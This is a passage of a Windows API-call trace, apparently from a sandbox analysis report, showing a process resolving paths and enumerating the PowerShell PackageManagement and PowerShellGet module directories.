[0149.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e290) returned 1 [0149.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e550) returned 1 [0149.694] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0149.694] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0149.694] FindFirstFileW (in: lpFileName="C:\\Windows\\get-.*" (normalized: "c:\\windows\\get-.*"), lpFindFileData=0x5a0e300 | out: lpFindFileData=0x5a0e300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2a8) returned 1 [0149.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e508) returned 1 [0149.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0149.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0149.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e294) returned 1 [0149.695] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\syswow64\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x5a0e558 | out: lpFileInformation=0x5a0e558*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x123dcea, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x496a9b80, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496a9b80, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0149.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e290) returned 1 [0149.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e550) returned 1 [0149.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0149.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0149.695] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\get-.*" (normalized: "c:\\windows\\syswow64\\wbem\\get-.*"), lpFindFileData=0x5a0e300 | out: lpFindFileData=0x5a0e300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2a8) returned 1 [0149.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e508) returned 1 [0149.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0149.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0149.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e294) returned 1 [0149.699] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x5a0e558 | out: lpFileInformation=0x5a0e558*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499a3700, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x499a3700, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e290) returned 1 [0149.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e550) returned 1 [0149.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2c [0149.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x2c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0149.701] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\get-.*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\get-.*"), lpFindFileData=0x5a0e300 | out: lpFindFileData=0x5a0e300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2a8) returned 1 [0149.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e508) returned 1 [0149.702] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5a0e3ec, nSize=0xc9 | out: lpBuffer="") returned 0xc5 [0149.706] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0149.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.708] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0149.708] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0149.708] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.708] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.709] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0149.709] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0149.709] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.709] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.709] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0149.709] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0149.710] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0149.710] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0149.710] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0149.710] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0149.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0149.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0149.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.710] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0149.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.711] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0149.712] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0149.712] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.712] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.712] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49b46620, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49b46620, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0149.712] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.712] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0149.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0149.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d4) returned 1 [0149.713] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e598 | out: lpFileInformation=0x5a0e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b46620, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea9fba0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea9fba0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0149.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2d0) returned 1 [0149.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0149.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0149.714] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0149.714] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0149.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0149.714] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2944610 | out: lpFileInformation=0x2944610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b46620, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea9fba0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea9fba0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0149.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0149.714] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0149.715] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0149.715] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0149.715] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0149.715] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0149.715] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0149.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0149.716] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.716] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.716] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0149.716] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.716] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0149.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0149.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d4) returned 1 [0149.717] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e598 | out: lpFileInformation=0x5a0e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0149.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2d0) returned 1 [0149.717] GetFullPathNameW (in: lpFileName="C:\\Program 